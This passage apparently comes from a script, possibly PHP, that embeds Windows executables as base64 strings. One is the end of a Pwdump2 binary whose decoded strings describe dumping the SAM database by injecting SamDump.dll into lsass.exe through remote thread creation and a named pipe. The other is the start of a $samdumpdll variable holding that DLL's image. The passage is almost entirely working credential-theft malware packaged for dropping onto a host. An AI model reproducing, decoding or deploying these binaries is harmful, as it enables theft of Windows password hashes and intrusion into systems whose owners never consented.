AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRmAABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAA JGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcAAEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADW ZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAAQGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5o AADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABSaQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkA ANRpAADgaQAA8GkAAABqAAAAAAAA/////wcdQAAbHUAABgAABgABAAAQAAMGAAYCEARFRUUFBQUF BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAAAAAAA//// /+tMQADvTEAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEA dXNlcjMyLmRsbAAA/////79WQADDVkAA/////3NXQAB3V0AAFGUAAAAAAAAAAAAAamcAABBgAAAE ZQAAAAAAAAAAAAC8ZwAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRm AABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAAJGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcA AEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADWZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAA QGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5oAADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABS aQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkAANRpAADgaQAA8GkAAABqAAAAAAAAwwBGcmVl TGlicmFyeQBTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAA/QJXYWl0Rm9yU2luZ2xl T2JqZWN0AE0AQ3JlYXRlVGhyZWFkAAA0AENyZWF0ZUV2ZW50QQAALQFHZXRMYXN0RXJyb3IAABEC T3BlblByb2Nlc3MAHgBDbG9zZUhhbmRsZQAJAUdldEN1cnJlbnRQcm9jZXNzAPICVmlydHVhbEZy ZWVFeABJAENyZWF0ZVJlbW90ZVRocmVhZAAAFwNXcml0ZVByb2Nlc3NNZW1vcnkAAO8CVmlydHVh bEFsbG9jRXgAAAoBR2V0Q3VycmVudFByb2Nlc3NJZAA4AUdldE1vZHVsZUZpbGVOYW1lQQAAZQBE aXNjb25uZWN0TmFtZWRQaXBlAD0CUmVhZEZpbGUAACYAQ29ubmVjdE5hbWVkUGlwZQAAkAJTZXRF dmVudAAARABDcmVhdGVOYW1lZFBpcGVBAABLRVJORUwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2 aWxlZ2VzABgBTG9va3VwUHJpdmlsZWdlVmFsdWVBAGcBT3BlblByb2Nlc3NUb2tlbgAAQURWQVBJ MzIuZGxsAAC6AUhlYXBGcmVlAAC9AUhlYXBSZUFsbG9jALQBSGVhcEFsbG9jAIwARXhpdFByb2Nl c3MAywJUZXJtaW5hdGVQcm9jZXNzAADaAEdldENvbW1hbmRMaW5lQQCOAUdldFZlcnNpb24AALgB SGVhcERlc3Ryb3kAtgFIZWFwQ3JlYXRlAADxAlZpcnR1YWxGcmVlAO4CVmlydHVhbEFsbG9jAACY AlNldEhhbmRsZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0 dXBJbmZvQQDbAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAwQBGcmVlRW52aXJvbm1lbnRTdHJp bmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAEDV2lkZUNoYXJUb011bHRpQnl0ZQAZAUdl dEVudmlyb25tZW50U3RyaW5ncwAbAUdldEVudmlyb25tZW50U3RyaW5nc1cAAFcCUnRsVW53aW5k AA4DV3JpdGVGaWxlALkARmx1c2hGaWxlQnVmZmVycwAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFyAGkB R2V0U3RyaW5nVHlwZUEAAGwBR2V0U3RyaW5nVHlwZVcAAJUCU2V0RmlsZVBvaW50ZXIAAM8AR2V0 Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAACoAlNldFN0ZEhhbmRsZQAA3AFMQ01hcFN0cmlu Z0EAAN0BTENNYXBTdHJpbmdXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAHQZQADUUkAAAAAAAAAAAAAZGkAAAAAAAAAAAAAAAAAAAAAAAEwAUwBBAFMA UwAuAEUAWABFAAAAUnRsQ29tcGFyZVVuaWNvZGVTdHJpbmcATnRRdWVyeVN5c3RlbUluZm9ybWF0 aW9uAAAAAE5URExMAAAAClB3ZHVtcDIgLSBkdW1wIHRoZSBTQU0gZGF0YWJhc2UuClVzYWdlOiAl cyA8cGlkIG9mIGxzYXNzLmV4ZT4KAEZhaWxlZCBzdGFydGluZyBsaXN0ZW4gb24gcGlwZTogJWQu ICBFeGl0aW5nCgAAAEZhaWxlZCB0byBjcmVhdGUgcmVjZWl2aW5nIHRocmVhZDogJWQuICBFeGl0 aW5nCgAAAABGYWlsZWQgdG8gb3BlbiBsc2FzczogJWQuICBFeGl0aW5nLgoAAAAARmFpbGVkIGVu YWJsaW5nIERlYnVnIHByaXZpbGVnZS4gIFByb2NlZWRpbmcgYW55d2F5CgAAAABVbmFibGUgdG8g ZmluZCBsc2Fzcy5leGUgcGlkIGF1dG9tYXRpY2FsbHkuCllvdSBuZWVkIHRvIHNwZWNpZnkgb24g dGhlIGNvbW1hbmQgbGluZQoAAAAAVW5hYmxlIHRvIGFkanVzdCB0b2tlbiBwcml2aWxlZ2VzOiAl ZAoAAFVuYWJsZSB0byBsb29rdXAgcHJpdmlsZWdlOiAlZAoAU2VEZWJ1Z1ByaXZpbGVnZQAAAABV bmFibGUgdG8gb3BlbiBwcm9jZXNzIHRva2VuOiAlZAoAAABDcmVhdGVSZW1vdGVUaHJlYWQgZmFp bGVkOiAlZAoAAFdyaXRlUHJvY2Vzc01lbW9yeSBmYWlsZWQ6ICVkCgAAVmlydHVhbEFsbG9jRXgg ZmFpbGVkOiAlZAoAAFxcLlxwaXBlXHB3ZHVtcDItJWQARHVtcFNhbQBTYW1EdW1wLmRsbABGcmVl TGlicmFyeQBHZXRQcm9jQWRkcmVzcwAATG9hZExpYnJhcnlBAAAAAEtlcm5lbDMyAAAAACVzAABG YWlsZWQgdG8gY29ubmVjdCB0aGUgcGlwZTogJWQKAEZhaWxlZCB0byBjcmVhdGUgdGhlIHBpcGU6 ICVkCgAAAAAAAACBQAAAAAAAAIFAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAA AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNGEAAAQAAABAAAAD4AwAAaGFAAFhhQAD/////AAoAAAp2 QAAKdkAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAg ACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQA hACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQAB AAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIA AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAQAAAC4AAAABAAAAAAAAAAAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADA BAAAAAAAAACNAADACAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACR AADACAAAAAAAAACSAADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAAIAWTGQAA AAAAAAAAAAAAAAIAAADUY0AACAAAAKhjQAAJAAAAfGNAAAoAAABYY0AAEAAAACxjQAARAAAA/GJA ABIAAADYYkAAEwAAAKxiQAAYAAAAdGJAABkAAABMYkAAGgAAABRiQAAbAAAA3GFAABwAAAC0YUAA eAAAAKRhQAB5AAAAlGFAAHoAAACEYUAA/AAAAIBhQAD/AAAAcGFAAAAAAAAAAAAAeVNAAHlTQAB5 U0AAeVNAAHlTQAB5U0AAAAAAAAAAAAABAgQIAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGl AAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4A AAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAA AAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR 2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAEAAAAWAAAAAgAAAAIA AAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAA AAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAA EgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABT AAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYA AAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAA AA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAA DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; $samdumpdll="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA5YhDKfQN+mX0Dfpl9A36ZlRx1mXwDfpmVHHSZNwN+mf4fcJluA36ZJCBt mXgDfpl9A3+ZNAN+mYIjdJl8A36ZgiN6mXwDfplSaWNofQN+mQAAAAAAAAAAUEUAAEwBBAAT+OA4 AAAAAAAAAADgAA4hCwEGAABQAAAAUAAAAAAAAIoaAAAAEAAAAGAAAAAAABAAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAsAAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYGsAAEYA AAAwZgAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADkBQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAOwAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAudGV4dAAAAKJNAAAAEAAAAFAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACm CwAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAoCYAAABwAAAAEAAAAHAAAAAA AAAAAAAAAAAAAEAAAMAucmVsb2MAAJQMAAAAoAAAABAAAACAAAAAAAAAAAAAAAAAAABAAABCAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 